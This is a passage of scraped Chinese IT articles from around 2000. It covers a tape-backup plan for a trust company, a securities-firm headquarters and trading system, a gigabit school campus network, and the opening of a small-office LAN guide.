2） 磁带的容量高、成本低。一盒磁带可存储高达70GB的数据，而每GB的存储成本在10元左右；

3） 磁带的数据传输速率非常高，可达60MB/分～600MB/分；

4） 可重复使用，易于携带和保管；

5） 允许无人操作的自动备份。

如果考虑到系统备份需要保存相当长一段时期的历史数据，以每月保存20GB数据计算，一年的备份数据量就是240GB，那么采用磁带是必然的选择。

2.备份软件

备份硬件是完成备份任务的基础，而备份软件则关系到是否能够将备份硬件的优良特性完全发挥出来。在宝鸡信托系统备份方案中，我们选择了CA公司的ARCserveIT。

ARCserveIT是一个跨平台的网络数据备份软件，在数据保护、系统恢复、病毒防护方面均提供全面的产品支持，能够实现Netware、Windows NT、Unix、OS/2等多种平台之间的跨平台网络备份。ARCserveIT能够全面保护NetWare和Windows NT操作系统，支持各种数据库（如Betrieve、Sybase、Oracle），支持打开文件备份、从服务器到工作站的全面网络备份，可以实现无人值守的自动备份，在备份前扫描病毒并实现无毒备份，具有支持灾难恢复、目录镜像与后备(Replication)等特性。

其中最值得注意的是灾难恢复与目录镜像，使用ARCserveIT的灾难恢复功能，只需要3张软盘，就能够使损坏的系统迅速起死回生。使用目录镜像功能，能够将多台服务器的文件实时复制到一台服务器上，并能够在被复制服务器发生故障时自动接管其身份，是对普通备份方式的重要补充。

如果使用了灾难恢复措施，无论系统遭到什么样的损坏，所要做的一切仅仅是找到相似的服务器，连接好磁带机，插入事先生成的启动盘，然后打开电源。随后，ARCserveIT会自动恢复整个系统，包括操作系统、系统设置、各种应用程序及所有的数据。

灾难恢复后，系统就恢复到了上次备份时的状态，那么在上次备份到发生故障之间的系统数据怎样恢复呢？如果使用了目录镜像功能，只用简单地将复制的数据恢复过来就可以了，否则就需要用人工方式进行恢复。

可以看出，如果在网络备份的基础之上实施灾难恢复和目录镜像措施，可以迅速提高系统在灾难发生后的恢复速度，在极短的时间内就可以恢复瘫痪的网络系统。表1 无备份、无灾难恢复和有灾难恢复的比较 无备份 有备份、无灾难恢复 有灾难恢复
更换硬件 更换硬件 更换硬件
配置硬件 配置硬件 插入启动盘及磁带
重装网络操作系统 重装网络操作系统 启动服务器
重装应用程序 重装应用程序和备份软件
从头恢复所有数据 用最近的备份恢复数据
2天～几个月 2～3天 30分钟～2小时

■三、备份方案设计

网络系统备份与基于单台计算机的文件备份不同，系统备份涉及到文件备份、数据库备份、应用程序备份等多个方面，在多数环境下还要实现跨平台的备份。如何根据系统情况设计合理的备份方案至关重要。

宝鸡信托投资公司计算机网络系统配置如下：

一台NetWare服务器运行行情系统，其数据库采用Xbase；一台Windows NT 4.0服务器运行交易系统，交易系统数据库为 MS SQL Server 6.5英文版。另外有Windows NT文件服务器2台，Windows 95/98工作站若干台。

备份要求包括所有NT服务器系统信息备份、文件备份及灾难恢复；SQL Server数据库备份；NetWare系统信息和活跃文件备份；所有NT文件服务器关键文件的实时备份。此外，还要求实现NT服务器实时病毒防护、NetWare服务器实时病毒防护、Windows NT/95/98远程控制。

ARCserveIT备份系统组织模式是：主模块＋选件。主备份程序只完成通用的备份功能，而比较特殊的备份功能则由各种选件来实现。ARCserveIT主模块在NetWare和Windows NT下分别有两个版本。

将一台单独的Windows NT服务器作为备份主服务器，用来备份NT交易服务器及NetWare行情服务器。备份软件配置包括ARCserveIT for Windows NT(主模块)、ARCserveIT Replication For Windows NT(文件镜像模块)、Disaster Recovery Option (灾难恢复选件)、Backup Agent for Open Files for NetWare(打开文件备份选件)、Backup Agent for Microsoft SQL server(SQL Server备份选件)、Client Agent for NetWare (NetWare备份选件)、Client Agent for Windows NT Server (NT server备份选件)、InocuLateIT for Windows NT(NT server 防毒选件)、InocuLateIT for NetWare(Netware防毒选件)和ControlIT(远程控制)。

备份系统在实施后减轻了IT人员很多的工作压力：每天的备份都由ARCserveIT定时自动完成，不用再输入复杂的备份指令，也不用担心备份会出差错；当有病毒进入服务器时，防毒软件就会自动阻止带毒文件进入，并能够封锁带毒的工作站；在一定的时间内，带毒的工作站就不允许再连接到服务器，这个功能非常有利于病毒源头的追踪；网络中重要的文件都被Replication软件镜像到后备服务器，这样就不用担心上次备份之后的数据会发生问题了；当某台Windows工作站出现问题时，IT人员也不用大老远跑到跟前去，只要通过ControlIT远程控制出现问题的机器就能够轻松的解决问题。

返回


证券总部管理系统

《一键清理系统垃圾》

证券总部管理系统

目标
    加强证券公司总部对下属营业部的管理尽量避免风险、减少差错，及时发现隐患 缩短营业部故障停机时间，避免营业部数据丢失 更合理、高效地运用资源 更好地为投资者服务

软件系统功能概述

Intranet 集团化证券公司跨地区管理 证券公司内部知识共享 方便地集成各个系统 简便易懂的Web浏览操作方式 先进的技术构筑的纽带
Extrane 与上市公司建立密切的联系 大规模信息交流和共享 时效性与实用性
服务中心 发挥规模效应、降低运营成本 提高服务质量、树立公司品牌电信部门合作、减轻股民负担
统计分析 决策层随时可获得最新资料 业务数据汇总，以图表形式直观显示 先进的分析模型库 可供二次开发
业务系统 提供丰富的功能，满足各项业务要求 融入先进的管理理念 集成化的系统，数据可共享
柜台系统 真正的"三个分离、一个稽核" 岗位分离、多级授权 稳定的协议交换
1.5 系统功能结构

关键问题解决方案

真正的"三个分离、一个稽核" 营业部是证券经营机构提供服务的窗口，也是直面各种威胁的前沿阵地。为此，证监会于1998年3月颁发《证券经营机构营业部信息系统技术管理规范》，并后续下发"关于加强证券经营机构计算机系统安全管理的通知"，正式提出在计算机系统安全管理上务必做到"三个分离"和"一个稽核"。

复旦金仕达中天证券软件自起步之时，就一直将安全问题放在首要位置。于1998年推出的中天券商综合管理系统Ver4.0采用了全新的设计思路，运用了最先进的计算机通讯技术和可靠的安全防范措施。

整个系统在安全体系设计上严格遵循证监会《规范》条例，在国内率先实现"三个分离"和"一个稽审"，并经过400多家证券公司营业部的实践考验，同时它是国内唯一顺利通过99年5月以来大行情考验的"三个分离"安全体系。

一． 业务和技术的分离：

系统提供三级管理模式管理职工，即经理、部门主管、一般工作人员。 第一级：管理者可根据本营业部的需要设立不同的职能部门（例如各种业务部门和技术 部门），赋予各部门具体的管理和操作权限，并设置该职能部门的主管。

第二级：主管根据本部门的职责任务需要设立不同 岗位，赋予不同岗位不同的职责权限。

第三级：对于从事某一岗位的职工可按实际需要设置权限范围。

主管、岗位和职工权限设置都可根据实际菜单一一设定。

系统提供一整套非常严格的职工操作管理体系，操作的详细情况，如工作站点、操作日 期、所用程序、修改内容等，都记录在案，防止了可能的违纪犯罪。

二． 前台与后台分离：

前台与后台通过外部网关彻底隔断，在外部网关上安装两块网卡，联NT网走TCP/IP协 议，联NOVELL网走SPX协议，在物理上构架成一道防火墙。

在外部网关上实现中间件技术，中间件主要提供三个层面上的数据处理：数据包过滤、 协议封装和应用程序代理过滤，以充分保证内部网络的安全。

系统对所有交易数据的交换，摒弃DBF交换方式，采用TCP/IP/SPX方式交换数据。

三．网络与数据分离：

中天券商综合管理系统Ver4.0选择C2级SQL Server 6.5为系统数据库平台，充分利用SQL Server提供的所有安全机制，确保系统的安全性、完整性和一致性。

系统对注册用户相应权限严格限制，注册用户只能对指定的存储过程执行权限和指定的 表Select权限。

文件服务器的超级用户密码和数据库SA密码分人管理，从管理上保障系统安全。

四．稽核和监控：

（1） 稽核方式

系统可通过操作权限对资金、股票进行随时稽核。

系统对利息积数变动情况进行稽核，从根本上杜绝了可能对利息的非法更改。

系统能对每一次修改所留下的记录进行技术稽审。

（2） 系统监控

系统对客户、公司的资金、交易情况等当日发生情况进行实时监控，防止非法操作和 过度投资给公司和客户造成损失。

系统对透支户进行监控和指定客户监控，一旦发生透支屏幕自动提示，对担保不足的客 户红色报警。

系统对公司资金发生情况，开销户情况，委托情况，成交情况，头寸调度情况，大笔资 金发生变化，大笔委托等情况违规操作后自动报警。

岗位分离、多级授权 系统实现了岗位分离、多级授权。采用三级管理模式，即经理、部门主管、一般工作人员。

作为第一级的总经理可根据需要设立不同的职能部门（例如各种业务部门和技术部门），赋予各部门具体的管理和操作权限，并设置该职能部门的主管。

第二级：主管根据本部门的职责任务需要设立不同 岗位，赋予不同岗位不同的职责权限。

第三级：对于从事某一岗位的职工可按实际需要设置权限范围。

主管、岗位和职工权限设置都可根据实际菜单一一设定。

总部和营业部的各个岗位都可分别设置操作权限。授权过程由总经理到部门经理再到营业部层层授权。

系统对注册用户相应权限严格限制，注册用户只能对指定的存储过程执行权限和指定的 表Select权限。

文件服务器的超级用户密码和数据库SA密码分人管理，数据库SA密码和操作密码分开管理，从管理上保障系统安全。

系统提供一整套非常严格的职工操作管理体系，操作的详细情况，如工作站点、操作日 期、所用程序、修改内容等，都记录在案，防止了可能的违五纪犯罪。

五、法人帐号管理

在法人帐号管理方面，系统已有考虑。可以在法人帐号下设立分帐号，进行每一个操盘手的盈亏分析。在盈亏分析的功能方面将大大加强。

客户管理

系统提供丰富的客户管理功能，不仅保留客户的交易数据等，还可对客户的各方面信息进行管理，包括客户身份证及其它有效证件、支票汇票等有价票据、协议书、重要客户委托单等，客户管理功能相当于一个小型的档案管理系统，能够有效地管理客户的档案，省去人工查找的麻烦。

关于设立服务中心的建议

证券公司的总部从职能上来说偏重管理，营业部则主要是为股民交易服务。但是很多交易手段如电话委托、网上交易等都是越集中越能发挥规模效应。因此我们建议有条件的证券公司可考虑设立服务中心。服务中心可与电信或联通等通讯部门合作，低价租用大量通讯线路，集中为股民提供各项服务。对于营业部分布在全国各地的证券公司可以在营业部比较集中的城市建立区域服务中心。服务中心的收费方式可采用包月制，每年或每月股民支付极低的费用后所有的服务均不再收费，而目前的通讯部门对于申请大量通讯线路的公司也可采用包月制，费用也相当低廉，只要定价合理，服务中心完全可以自负盈亏。

我们系统中的周边系统、网上交易等都可支持服务中心的模式。

金仕达内部网信息系统（Intranet）是基于Internet的TCP/IP协议和WEB服务，通过浏览器可访问到内外部各种不同的信息和资源，提供了一个灵活多变，高效的网络信息平台，可实现包括异地机构，合作伙伴，供应商以及客户在内的整个企业的信息集成；Intranet可以方便地集成其它系统，如电子邮件，文件传输，电子新闻，电子公告栏，电子表格，查询检索，各种数据应用系统，可视会议及基于WEB的协作群组系统（如Lotus Notes），WEB的分布式,HTML的多媒体化为信息系统的集成化，智能化，分布式，网络化创造了良好的环境。

1 . Web服务系统

利用以Web为中心的技术是实现Intranet中应用开发和部署的基础, 实现信息共享，信息交流及员工协同工作。主要应包括企业信息的动态发布，新闻组(News Group)，内部聊天室(Chat Room)，网络会议(NetMeeting)，电子布告板(BBS)服务，文件传输(FTP)服务。

企业信息内容包括：

公司简介(公司背景，营业部分析，主营业务介绍等等)；有利于客户及外部人员更好的了解公司，提高知名度。

新闻服务(财经报道，每日要闻，公司动向)；充分利用网络的时效性，使得人们能够在最短的时间内获取各种最新的消息。

信息资讯(股市传真，本周焦点，黑马纵横，主力动向等等)；有别于一般的新闻站点，从证券公司发表的证券资讯，技术分析，对于广大用户将有更大的权威性，增大网站的访问量，提高公司知名度，相应的更好的公司的业务。

最新技术动向。可以不定期的发表一些技术文章，跟踪最新技术，提供各种解决方案。

所有这些信息可以跟E-mail联系起来，只要用户订阅了公司的新闻邮件，每天自动发送邮件给订户，使用户跟公司紧密联系起来。

对于新闻组，设立诸如公司管理区，业务经营区，技术讨论区，自由 区等不同类别的讨论组。员工可以对感兴趣的热点发表自己的看法，进行自由交流。最大的发挥大家的力量，更好促进公司发展。

相对于新闻组，内部聊天室更加实时性，公司可开几个专题讲座区， 有一个人主要负责一个讲座区，在各营业部之间，大家可对同一感兴趣的问题进行实时交流。同时，我们可以限制聊天室的开放时间，以免分散员工工作精力。

在硬件条件许可的情况下，公司管理人员或各部门甚至可以进行网络 视频会议(NetMeeting)。它可以在不同的地方实时传输会议人员的声音和图像。

FTP传输服务，用户可以从公司下载诸如行情数据，分析软件等，在 家里自己分析研究。

2. Intranet应用服务

对于金融证券业，主要应包括交易信息，证券信息的综合查询。

交易信息主要有交易所的行情成交及其他信息。用户可以查询本人当天委托了 多少笔，成交了多少笔，等等。 证券信息包括即时行情和基本面分析，如公司每日(或一段时期)交易情况的统计、 成交、涨跌排名，历史数据分析等。

3．办公自动化系统 包括公文流转系统，日常办公事务管理，日程安排，个人事务管理，电子邮件。在本子系统中，可以随时查询各种公共信息，完成日常办公以及一些行政管理工作，并利用工作流机制自动流转审批，对业务人员的工作提醒，创造了很好的内部协同工作。

公文流转系统包括：会议通知、文件传阅、信息公告、行政事务、人事命令等；真正体现了网络化管理的方便、快捷，实现了无纸化办公。

日常办公事务管理包括：信息公布、会议管理、用车管理等；

日程安排包括：日程安排、工作计划；企业经常需要召开会议或安排项目进度，因此日程安排和进度安排就显得格外重要。工作组一级日程安排和进度安排建立在个人一级的日程安排基础之上。工作组一级的进度安排可以限定个人的进度安排。

个人事务管理：备忘录、个人名片、计事本。

电子邮件是整个办公自动化的基础，信息的交流都通过电子邮件途径实现。当然，电子邮件也是用户的一个网络"信箱"。

4．其他功能 针对系统中的特别要求，可以开发特定的信息浏览界面以及其他功能，诸如在网上实现电子交易，进入电子商务的时代。

总部分析统计系统

自1978年确立改革开放政策以来，中国的经济发生了天翻地覆的变化，市场经济的运作体系逐步走向规范，金融证券业的发展备受世界瞩目。

特别是随着《证券法》的颁布以及金融机构面临的重大改革，使证券从相对分散的以营业部为主体经营模式逐步转变为以公司总部集权化管理模式，如何规避市场风险，如何获得最大的经济效益，如何更为有效地服务于客户，这些重要的课题都摆在了券商面前。

为适应新的市场业务需要，必须有一套完整的电子信息化系统，实现对整个证券公司，包括总部、分部以及各个营业部的智能化管理。对于如此庞大而又复杂的计算机网络系统而言，系统本身的安全性、可靠性、有效性成为至关重要的核心问题。

1 当日查询

当日查询提供当日业务情况的综合查询，包括营业部当日查询、客户当日查询，可对特殊股东、透支股东进行特别监控，查询范围包括交易状况及头寸、新股申购状况、国债买卖、回购、交易情况、股份情况、客户资料等。

2 盘后查询

盘后查询提供历史业务情况的综合查询，包括营业部查询、排行榜、透支查询、特殊股东查询等

3 统计分析 统计分析子系统在业务数据的基础上作进一步加工提炼，对一些关键数据进行对比分析，大大方便了经理层的决策。统计分析子系统提供的分析功能包括委托方式比较、各类客户的成交比重、资金构成、新增资金对比、大盘走势与资金构成分析、委托、成交的比例分析。

总部业务系统

1 实时监控

实时监控子系统用于在总部实时监控各下属营业部的交易状况，及时把握情况，尽早发现问题。

2 实时数据采集

数据采集（数据交换）子系统是基于通讯平台介于总部和营业部之间的应用层数据交换子系统。

3 实时交易恢复

对于证券交易营业部来说，停止交易可是最致命的，它不但会造成股民和券商重大的经济损失，造成券商和股民的经济纠纷，而且直接影响营业部的声誉，最终导致客户流失，在竞争中败下阵来；而引起停止交易的情况有很多因素，如病毒感染、雷击、服务器硬件故障、火灾等都会给券商带来交易的中断，有的甚至中断几个交易日。为了避免交易中断给券商和股民带来的经济损失，在极短的时间内恢复正常交易，必须有一套好的恢复系统。证券公司通过总部的备用交易系统，可实现营业部交易的实时恢复。

4 异地数据备份恢复

为了保证数据的安全性和完整性，在营业部发生灾难性事故时，将由总部的实时恢复系统把营业部的交易接管过去。但为了事后能及时恢复营业部的正常交易，不影响今后的营业，就需要异地数据备份恢复系统。该系统在交易结束后，将当天各营业部盘后数据，通过远程数据通信系统发给总部，在总部做数据备份。在恢复数据时，总部提供备份数据，可以将营业部的数据完全恢复出来，与事故前一致，不影响明天的交易，及时为客户挽回经济损失。

5 法人清算

由于现在大证券公司通常只有总部具有法人资格及与交易所的清算席位，而其营业部只有交易席位，其和交易所的清算必须通过总部来实现。《法人清算系统》就是完成这一目的，具体讲，各营业部把各自的保证金（也称头寸）放在总部，总部再将一个总的保证金存放在交易所清算中心。 当每天交易结束后，交易所把该证券公司该日的实际清算资金从它在交易所清算中心的保证金帐户中划走或汇入，而各个营业部的实际清算资金在总部的保证金帐户中进入划帐。

6 集中委托和报盘

7 自营管理

8 财务管理

9 系统维护

实现系统参数设置、信息维护等功能。

网上交易系统

随着网络时代的到来，证券期货的网上交易正日益成为证券和期货市场中一种新型的交易方式被广大券商、经纪公司和投资者所接受。在日益激烈的市场竞争中，为了开拓新的客户资源，为了追求营利，网上交易无疑会作为一种新的交易模式为广大券商和经纪公司所青睐。

所谓证券期货网上交易，通常是指投资者通过互联网资源获取咨询信息和行情信息，并在交易软件的帮助下进行委托下单，实时交易。它具有不受地域，营业部和投资人限制，高效便捷等特点。因此，随着信息技术应用的不断深入，随着互联网和电脑的不断普及，网上交易必将成为中国证券行业一道独特的风景线。

1. 交易服务 交易服务提供与交易有关的服务，包括买卖委托；当日委托、成交查询，撤单

2. 查询服务 查询服务用于向使用本系统的网上股民提供信息。此功能突出个性化和多样化。

个性化即根据用户的登录情况，取得用户的基本信息，并获得各个用户的个人配置，在显示内容、显示方式、操作习惯等各方面允许用户自行定制。每当用户登录时，用户就会进入一个自己熟悉的专为他本人制作的环境中，这对于各大券商和期货经纪公司吸引投资者会有很大的帮助。由于复旦金仕达采用的是内容与格式分离的制作方式，很容易实现网页的个性化定制，这种技术将大量运用于本网站的建设中。

查询服务包括的功能有委托查询、成交查询、资金余额及变动查询、 股票余额及变动查询。

3. 行情服务 行情是证券交易中最为重要的信息，行情处理方式的好坏是直接影响到股民的上网热情的关键因素。为了符合广大股民操作习惯，我们将提供纯Web仿钱龙界面的行情服务。但根据我们对国外交易网站的分析，字符界面的行情加上历史行情走势图完全能够满足证券投资的需要。这种行情服务既响应迅速又可减轻服务器以及终端的负荷。我们将同时提供这两种行情服务供股民选用。

4. 信息服务 信息服务是证券期货交易网站提供的服务中最关键的部分。尤其各证券公司和期货经纪公司的研究报告是非常有价值的。我们建议实行客户分级制。一般的信息是所有股民都可访问的，部分信息只有开户的投资者才能获得，而某些重要信息只有少量客户才能访问。这中间也可配合各公司实行部分有偿服务。 信息服务要做到信息多而不滥。要使更多的股民访问网站必须使本网站上的资讯全面翔实，同时又分类恰当，需要查找某条信息时能够很快速地找到。这就需要各证券公司和复旦金仕达运用各自在证券行业中多年服务的经验，共同设计此网站的信息编排。

个性化定制在信息服务中可得到充分的利用。注册的股民可以定制自己感兴趣的信息，然后由计算机系统替股民筛选出与他相关的信息。

5. 模拟股市及投资学校 在这个游戏系统当中，除了股民的钱和不影响交易所交易之外，其它的如行情，清算，委托等，都是与实际情况完全一致的。

在此股票模拟交易系统中，我们实现了模拟"银行"、模拟"证券交易所"、模拟"中央结算登记公司"、模拟"证券营业部"。我们提供"每日排名"、"每周排名"、"每月排名"。对于每次排名靠前的几位参与者请股市专家对他们的投资组合进行点评。 投资学校部分可由各证券期货公司编写"投资指南"，也可将一些投资常识或注意事项以"每日一题"的形式提供给股民。

6. 个人理财、个人服务 我们提供的个人理财服务，除了包括成本、市值、盈亏、浮动盈亏等投资状况的计算，还包括交易点与走势对比分析、交易点与成交量对比分析等。对一些重要的股民还可提供以各公司客户为抽样样本的持股客户分类对比。

个人服务包括股市变动提醒和个人帐户提醒。股民可以用股市变动提醒功能自行设置提醒线，使计算机监视股市中某一股票的价格、成交量等，一旦到达提醒线就通过预先设定的方式通知股民。各证券期货公司也可通过个人帐户提醒功能，对一些未缴费或由于多次登录错误而被怀疑有可能被恶意入侵的帐户进行提醒。

7. 服务介绍 由证券公司所提供的各种服务项目的介绍和热联接。

8. 股市沙龙 股市沙龙是吸引投资者的好地方。股民之间需要交流，网上的股民也不例外。对于计算机系统来说，开设股市沙龙既不费钱又可聚拢"人气"。

9. 邮件杂志 上网做股票交易的股民一般都会有Email地址。没有Email的股民可以在本网站获得免费Web Email。我们可以利用Email传送邮件杂志、发送Email对帐单。邮件杂志分成几类，股民可以自行订阅。

柜面系统

中天券商综合管理系统Ver4.0于1998年6月11日在深圳正式发布，现已成功地运行于国通证券、东方证券、江苏国投等全国性400多家公司。该系统采用了全新的设计思路，在安全设计结构上认真贯彻了中国证监会1998年3月发布《证券经营机构营业部信息系统技术管理规范》的通知要求，而且是国内唯一顺利通过99年5月以来大行情的考验，具有"三个分离"安全体系的新一代证券交易系统。整个系统由柜台管理、日终清算、经理管理、系统维护、报表管理、统计分析六大功能模块构成，实现了所有的委托方式，并实现了"通买通卖"、"全国漫游委托"、"集中银行转帐"、"集中电话交易""集中可视委托"等公司级管理需求功能。

先进的体系结构 系统采用最先进的多层次Client/Server体系结构，使得系统运行更可靠、更便于控制和管理，客户端通过"中间件"的服务平台和服务器相连，Client和数据库不发生联系使系统更安全，也更便于维护。

安全可靠体系 证券交易系统安全性问题不仅来自于内容的管理，更重要的一个方面是电脑"黑客"问题，目前这一问题的形势是十分严峻的。

对"黑客"攻击应加强两个方面的管理，首先保证证券交易系统在内部管理的安全性，还有一点就是加强证券网络的安全防范措施。"中天券商综合管理系统Ver4.0"对证券网络的设计采取了一套先进的防火墙管理技术，通过外部网管把前后与后进行彻底分离。对于各种委托方式和远程联网，摒弃DBF交换数据，采用TCP/IP/SPX方式交换数据，对资金服务器与行情服务器采用实时备份，确保数据的绝对安全保障。

面向公司级管理，面向未来的设计 系统可以在所有非柜台委托方式下自动实现"通买通卖"、"全国漫游委托"，系统采用客户号管理，对职工权限不仅细化到每级菜单，还能限制操作对象、操作的币种和交易的品种，对客户进行分类管理。还具有方便灵活的经理管理功能，多样化统计与分析功能，使得经营决策有了可靠的依据。

周边系统 周边系统给股民提供了多种多样的委托方式，包括电话委托、传真服务、"一线通"可视委托、Modem可视委托。此外还有一套中天委托"四合一"系统，真正实现集电话委托、传真服务、"一线通"可视委托、Modem可视委托四种功能于一体。

中天委托"四合一"系统是目前国内唯一只需采用一台PC机一条电话线即可实现有效的多功能服务系统。该系统不需采用大量的硬件设备，对现有营业部电话线路进行共享，并在一个系统内部支持多种硬件。

在数据交换过程中，摒弃DBF交换方式，采用TCP/IP/SPX数据包交换数据，对保证投资者的利益不受到侵害有了可靠的技术保障。

返回


中等学校千兆校园网解决方案

《一键清理系统垃圾》

中等学校千兆校园网解决方案

    校园计算机网络已成为学校办学的基础设施和必备条件。中国华育发展总公司是国家教育部直属的，以开发教育软件和网络集成为主，推进教育教学信息化和现代化为主要经营方向的综合型企业。
    经过广泛的市场调研和针对中等学校办学特点和应用需求的潜心技术研究，中国华育开发出“中等学校千兆校园网整体解决方案”，该方案以千兆主干网络为基础平台，以校园网应用为主线，以实现广泛的教育资源共享、提高教育教学的现代化水平为目的，为建设信息化学校提供了一个完整的解决方案。

    针对不同类型的学校，中国华育开发了中国职业教育校园网集成系统CVES、中国基础教育校园网集成系统CFES。整个学校的办公自动化、教育管理、图书馆管理、多媒体教学及远程教育可以一网解决。

    做为一个典型的案例，山东省寿光第一中学千兆校园网的建设，可以用来说明这类学校对于信息化的要求，以及在网络技术上是如何实现的。其千兆校园网全面解决方案由中国华育发展总公司信息工程事业部负责设计与实施，于2000年7月开始，2000年8月31日完成。这是一个整体规划、分步实施、充分考虑现有设备与实际资金情况的方案，先建立网络中心和主干网，然后建立学校的信息管理网络、教学网络、图书管理网络和电子阅览室各应用子系统，并进行教学楼、办公楼、图书馆和结构化布线，将网络扩展到整个校园，实现校园网的全部功能，最后可通过路由器与CERNET和Internet接入。该方案充分考虑到学校的应用和奖金情况，具有较高的科学性和参考价值。

    校园网建设应该以应用为核心，在设计中充分考虑到教育管理和多媒体教学的要求，并且网络技术上应该具有一定的先进性，同时还要为以后的扩展留有一定的空间。为此校园网应该能达到以下要求。

    * 网络具有传递语音、图形、图像等多种信息媒体功能，具备性能优越的资源共享功能。

    * 校园网中各终端间具有快速交换功能。

    * 中心系统交换机采用虚拟网技术，对网络用户具有分类控制功能。

    * 对网络资源的访问提供完善的权限控制。

    * 网络具有防止及便于捕杀病毒功能，以保证网络使用安全。

    * 校园网与Internet网相连后具有“防火墙”过滤功能，以防止网络黑客入侵网络系统。

    * 可对接入因特网的各网络用户进行权限控制。

    校园网硬件设计

    1.校园网主干网络

    在山东寿光一中千兆校园网方案中采用基于第三层交换的千兆以太网作为校园网主干。

    在本方案中，主干交换机采用LUCENT公司CAJUN P550交换机，它属于第三层千兆以太网路由交换机，内部集成路由功能，具备高容量、无阻塞、优质的管理能力和可靠的多媒体支持等特点。将千兆以太网交换、快速以太网交换、以太网交换以及路由都集成到一个交换机中，使得交换机的功能十分强大。

    节点交换机和主干交换机之间通过千兆光纤连接。

    办公楼和主要教学楼采用Cajun P330交换机作节点交换机，西区教学楼采用Cajun P120交换机作节点交换机，对一些分散的节点采用D-LINK交换机，组成快速以太工作组网。

    2.网络服务器

    网络服务器包括文件服务器、Internet服务器、网管工作站、以及面向全校使用的小型机等。

    服务器根据学校的要求选择了DELL系列服务器。

    3.干线光纤

    在校园网中，此次需敷设十二条主干光缆，采用的是多芯室外铠装多模光缆。

    4.结构化综合布线：

    本方案中，我们采用Lucent Technologies 的SYSTIMAX SCS综合布线产品。

    依据结构化布线原则与本着达到布局美观的效果，楼宇间的布线采用光纤，各楼层的布线要走PVC管或在天花板内走线，并在结构化布线系统中的信息插座留有了一定的冗余度，以确保日后终端设备位置调整和网络扩展的需要。

    5.广域网互联和网络安全

    广域互联也是本设计的重点，本方案中使用PortMaster2R通过一条DDN专线，将校园网接入中国教育科研网CERNET，从而进入国际互联网Internet。

    为保证网络安全，防止黑客非法侵入网络，网络必须提供IP防火墙，PortMaster2R内置防火墙，可有效地保证网络的安全。

    6.应用子网及网络互连

    寿光一中校园网除网络主干外，还应有教育管理子网、图书馆管理子网、电子阅览室子网、计算中心子网等子网。

    对于已有的子网只需要通过节点交换机的10M/100M以太网接口与该子网的集线器或交换机相级联即可。

    网络管理及系统软件

    本方案全部采用智能网络设备并通过网络管理协议传送给管理设备。本方案采用LUCENT基于Windows NT平台的Cajun View软件，通过网络管理工作站可以对整个网络的智能设备进行有效的图形管理。

    本方案使用的系统软件如下：

    网络平台：WINDOWS NT SERVER 4.0中文版，工作站端用PWIN98；

    数据库开发平台：Microsoft SQL Server 7.0；

    邮件通讯软件：Microsoft Exchange Server 5.5；

    应用软件包括：

    办公自动化软件：Microsoft OFFICE 97/2000；

    多媒体教学及课件制作软件：HYmedia；

    多媒体视频点播软件：HYVOD

    校园网应用

    1.校园网管理信息系统

    中国基础教育校园网集成系统CFES面向全校，覆盖教育行政管理、图书馆管理、后勤管理和互联网连接等领域，分为教学管理、学生管理、行政管理、通用服务、互联网络和图书馆管理等分系统、以及教务管理、教师管理、教材管理、设备管理、学籍管理、考绩管理、人事管理、文书管理、综合查询、通用查询、电子邮件、远程登录、图书编目、图书流通、图书检索和馆长查询等近七十个管理子系统。

    CFES集管理、教学和科研为一体，是中等专业学校信息化的全面解决方案。CFES软件采用了新的开发平台（ASP）和数据库平台（SQL SERVER），软件设计采用了C/S和B/S结构。系统运行平台为中文Windows，软件风格统一，可视化图形界面、丰富的联机帮助，操作简便，使操作人员轻松上手。

    2.校园网计算机教学系统

    计算机教学系统主要包括多媒体网络教室和多媒体视频点播、多媒体视频广播系统，该方案首先实现了多媒体网络教学功能。

    采用公司自有产品：华育多媒体视频点播系统和多媒体课件制作平台。采用纯软件构架，为现代化教学提供了一个新的平台。

    5.3 校园网站

    校园网不是一个独立的、封闭的体系，校园网与Internet互连后，校园网用户在权限允许的范围内可以使用Internet上的Web访问、Email收发、FTP、Telnet、BBS、新闻组、讨论组、个人主页等服务。

    校园网站连接Internet，用于宣传学校形象、教学信息发布、提供信息查询等，以后可成为网上教学的渠道。网站主页的设计，主要由老师创意，学生制作，体现学生的创造性，培养学生的动手能力。

    方案特点

    在对学校的需求进行了详细的分析，并综合网络技术的发展，山东寿光一中的校园网方案具有先进性、可扩展性、开放性、安全性、可管理性和丰富的应用。是中国华育发展总公司开展教育信息工程的成功案例，该校也成为山东省信息化学校的一个样板工程。

返回


中小型办公局域网的实现

《一键清理系统垃圾》

中小型办公局域网的实现

      随着办公自动化的深入，进行微机互联的单位越来越多，如何组建一个经济、实用的局域网成为一热门话题。本文为你提供一种较为经济、易于维护的组网方式。本版也希望广大读者就这一话题踊跃投稿。
中小型办公局域网的实现
    目前常用的局域网典型结构有：3＋、NOVELL、DECnet、IBM Token－Ring以及AT&T StarLan等等，然而这些结构形式的网络的组网、维护都较为复杂，不很适宜中小型办公系统使用。鉴于这种情况，笔者提供一种较为经济、易于维护的组网方式，供大家组建中小型局域网时参考。
    局域网选择的基本考虑：
    1.网络标准化，以支持网络扩展和互联。
    2.访问控制方法，网络应满足吞吐量和响应时间的要求，尤其要考虑负载峰值和平均吞吐量。
    3.网络传输距离和拓扑结构，应满足用户的现场环境和介质访问的要求。
    4.传输介质应满足网络带宽、抗干扰和安装等要求。
    5.工作站应具有相当的处理速度及内存容量。
    6.网络管理软件应支持多种服务、管理功能及兼容性要求。
    网络结构设计：
    在设计网络结构时，要考虑其成本、扩充性、安装维护是否方便等。综合这些因素，在以太网与令牌网两种结构类型中，笔者建议选择以太网，这是因为以太网的组成较为简单，便于非专业人员的日常维护。鉴于各工作站独立工作及协同工作的双重要求，工作站微机间的连接采用星形拓扑结构，在主计算机(HOST)与工作站间采用总线结构，以增强多用户访问时的可靠性，保证一定的传输速率。
    网络连接介质的选择：
    因双绞线以太网10BASE－T是局域网发展的方向，也是目前的主流，故用户机与集线器(HUB)间选用无屏蔽双绞线(每段双绞线的长度不得超过100米的极限，否则会对数据传输速率造成较大影响)。干线电缆、主计算机与干线电缆的连接、集线器与干线电缆的连接均采用50欧姆的基带同轴电缆。考虑到连入Internet的单位越来越多，网络结构图设计如下：
    连网微机的配置要求：
    6M以上内存，40M以上硬盘，80386以上处理器。主计算机因需带一些外设以便共享，所以该机应采用综合性能较高的计算机。
    网络适配器(网卡)的选择：
    据笔者的使用经验，100元左右的兼容网卡已能满足中小型办公网的要求，因此在资金不很宽裕的情况下，没必要去追求名牌网卡，选用NE2000、3C503兼容的网卡即可。另外，选择网卡时注意与接入电缆类型匹配，每台设备联入总线需一个T型接头。
    集线器(HUB)的选择：
